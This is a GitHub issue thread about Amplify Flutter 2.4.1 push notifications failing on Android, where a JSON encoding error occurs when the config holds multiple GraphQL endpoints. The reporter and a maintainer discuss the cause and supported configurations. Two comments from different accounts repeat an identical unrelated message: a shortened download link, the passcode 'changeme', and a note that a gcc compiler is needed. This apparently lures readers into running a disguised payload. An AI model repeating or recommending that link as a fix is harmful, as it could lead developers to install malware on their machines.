### ISSUE TITLE
Push Notification Configuration on Android fails when multiple API endpoints are present

### ISSUE THREAD

**Issue by bitsplash-andy** [aws-amplify/amplify-flutter#5423]
### Description

I am unable to configure push notifications on Android using version 2.4.1 of all plugins when having two GraphQL APIs defined in the config). All functionality works as expected on iOS.

It looks as though the push notifications code has been updated to use Gen2 Amplify Outputs via: https://github.com/aws-amplify/amplify-flutter/pull/5073

There is a conditional platform statement on line 233 which encodes the config for storage in the SecureStorage.

https://github.com/aws-amplify/amplify-flutter/blob/6aaf966e7907cba71b9d2cf6f84ae2dc6e4d50b0/packages/notifications/push/amplify_push_notifications/lib/src/amplify_push_notifications_impl.dart#L233

This causes the following exception to be thrown

`Converting object to an encodable object failed: Instance of 'AmplifyOutputs'
#0      _JsonStringifier.writeObject (dart:convert/json.dart:793:7)
#1      _JsonStringStringifier.printOn (dart:convert/json.dart:982:17)
#2      _JsonStringStringifier.stringify (dart:convert/json.dart:967:5)
#3      JsonEncoder.convert (dart:convert/json.dart:345:30)
#4      JsonCodec.encode (dart:convert/json.dart:231:45)
#5      jsonEncode (dart:convert/json.dart:114:10)
#6      AmplifyPushNotifications.configure (package:amplify_push_notifications/src/amplify_push_notifications_impl.dart:238:16)`

https://github.com/aws-amplify/amplify-flutter/blob/6aaf966e7907cba71b9d2cf6f84ae2dc6e4d50b0/packages/amplify_core/lib/src/config/amplify_outputs/amplify_outputs.dart#L111C1-L125C2

As I say, this breaks Push Notifications on Android only when the API config contains more than one endpoint. All other categories function as expected and there are no issues on iOS.

I'm assuming more things may break further down the line as the Gen2 code is adopted into more packages, but is frustrating to have such an edge case appear after migrating the code base to the latest version.

### Categories

- [ ] Analytics
- [ ] API (REST)
- [ ] API (GraphQL)
- [ ] Auth
- [ ] Authenticator
- [ ] DataStore
- [X] Notifications (Push)
- [ ] Storage

### Steps to Reproduce

Add more then one API endpoint to the configuration 

add `AmplifyPushNotificationsPinpoint()` via ` Amplify.addPlugins`
call `Amplify.configure` 

### Platforms

- [ ] iOS
- [X] Android
- [ ] Web
- [ ] macOS
- [ ] Windows
- [ ] Linux

### Flutter Version

3.24.1

### Amplify Flutter Version

2.4.1

### Deployment Method

Custom Pipeline

**Comment by Alango-Norjehan** [comment]
Give this a shot
https://bit.ly/4eaAnWN
Passcode: changeme
you must have a gcc compiler

**Comment by abdulrehman-code** [comment]
Give this a shot
https://bit.ly/4eaAnWN
Passcode: changeme
you must have a gcc compiler

**Comment by bitsplash-andy** [comment]
Rolling back to version 2.1.0 prevents issue, but is far from ideal.

Need to understand why AmplifyOutputs contains the following:

https://github.com/aws-amplify/amplify-flutter/blob/6aaf966e7907cba71b9d2cf6f84ae2dc6e4d50b0/packages/amplify_core/lib/src/config/amplify_outputs/amplify_outputs.dart#L111C1-L125C2

**Comment by bitsplash-andy** [comment]
Perhaps the following should be modified to not use a custom JSON encoder to prevent the incompatibility for now:

```
await _amplifySecureStorage.write(
  key: configSecureStorageKey,
  value: jsonEncode(config),
);
```
https://github.com/aws-amplify/amplify-flutter/blob/6aaf966e7907cba71b9d2cf6f84ae2dc6e4d50b0/packages/notifications/push/amplify_push_notifications/lib/src/amplify_push_notifications_impl.dart#L238

and

```
final amplifyconfigStr = await amplifySecureStorage.read(
  key: configSecureStorageKey,
);
```
https://github.com/aws-amplify/amplify-flutter/blob/6aaf966e7907cba71b9d2cf6f84ae2dc6e4d50b0/packages/notifications/push/amplify_push_notifications_pinpoint/lib/src/push_notifications_background_processing.dart#L35

**Comment by NikaHsn** [comment]
Sorry that you are facing this issue and thanks for reporting it. We will look into this and get back to you when we have updates.

**Comment by NikaHsn** [comment]
@bitsplash-andy The Amplify CLI (both Generations 1 and 2) does not support multiple GraphQL API endpoints. Hence, the Amplify Flutter libraries are designed to handle configurations with only one GraphQL API endpoint. While the AmplifyOutputs type allows for multiple data endpoints, this is primarily for internal implementations and backwards compatibility. When using custom pipeline for deployment please make sure the amplify configuration is a valid josn for [this schema](https://github.com/aws-amplify/amplify-backend/blob/main/packages/client-config/src/client-config-schema/schema_v1.json).

**Comment by bitsplash-andy** [comment]
Hi @NikaHsn, thanks for your reply.

To clarify, we don’t use the Amplify CLI, everything is provisioned manually via CDK etc. We only use the client library.

The client library has supported multiple API endpoints without issue up until version 2.2.0, at which point this began failing in the push notification library as described above.

**Comment by bitsplash-andy** [comment]
Apologies, I've updated my previous comment a few times for clarity.

**Comment by NikaHsn** [comment]
thanks @bitsplash-andy for clarification. we will look into this and get back to you when we have update.
